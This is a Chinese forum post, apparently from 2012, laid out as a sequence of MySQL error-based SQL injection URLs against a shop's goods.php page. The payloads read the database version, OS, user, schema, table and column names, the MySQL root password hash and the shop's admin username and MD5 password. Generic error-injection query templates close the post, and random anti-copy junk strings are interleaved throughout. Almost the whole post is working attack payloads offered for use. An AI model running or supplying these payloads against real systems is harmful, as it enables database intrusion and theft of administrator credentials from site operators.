判断版本号 . B g7 c, R: C9 L; L. X' }, O. v
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
9 T% E$ P0 `9 u z- q( O g" I+ l' ?, W3 t( J6 E) f
判断系统
# P, {; o* t3 Q/ |; j3 a
+ {+ w I$ c& L. @* Ihttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
% F1 k0 |; E4 ~0 ^. g! P& b
0 f" r2 w- e4 V1 f$ I, y
# a: {0 [4 C& U8 q1 r: C% y, @
$ i+ X. t7 O2 q* t( x3 G5 X2 T4 B当前 user()
' Y8 V O% P* z4 ~
( t! w+ M f' r$ J4 ]$ nhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
- F& w( D1 }) w8 j# g* c
( w5 ?! L% c, f; ?3 `
, C: e: l3 X0 Y% }
- E0 C L+ k) |& t& [当前 database()1 `3 X+ O' Z; |2 A# x; J1 E
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%236 K" e5 S+ L: _( c V# \
9 m* q. s! f( \. ~
% R4 K+ A4 {# x" W
- U2 m& \5 Y: K. K/ ^# w" X# F f
# [. ]* _# o% Y2 r' w) `root hash
c/ E5 M2 [: @2 T$ e1 e" U( \; E* n. k
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%237 L; ^, _, R) N' I& D( M
: x$ Z% q2 D9 l. N
0 | V, R0 u6 V3 \
$ x* T9 i" g) w
当前 数据库表名
2 I3 U$ K V7 W9 y8 J* j
0 Z7 R7 [! C" a1 W E& m! [http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23# s$ a" C1 p F* T
) r( d! Y! p# w2 t& ^: _
K) ]# ^( f y7 p6 B! u
- z6 @# d; P# m1 e8 X4 H当前 数据库 user_name 字段
. }. D3 e7 r; m2 S r
: `. [5 T* G8 z1 q# nhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
& n" i: `, d' p0 u& j4 g- l8 D5 Q# A+ T6 }
当前 数据库 字段 password
+ Q. g. U" }, Y1 Jhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
3 _( z( H. U% }
3 y3 y3 {* F _
H$ K, J2 @9 S* O# J% n' m! O' B- i% C
获得 admin passwd(md5)1 A: W+ T) @3 J, ]0 F
+ }5 S) D6 Y8 h/ s$ \' h
1 p1 J3 _$ o4 [0 C3 Z0 x. b" Z( S! Zhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
+ o6 C) t: F" Z! P
. b, T' _) o8 m/ c3 K9 g报错注射
% [3 b2 ]* i3 F2 h" sSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
1 T! {2 a) ^0 F3 I9 k" F% q1 C- l+ b; I; a& Z# F4 {
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)6 I* T6 J! B/ P
5 Y5 r& K( k) K$ _% a* H$ ^4 Y
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |
发表于 2012-9-5 14:59:30
收藏
支持
反对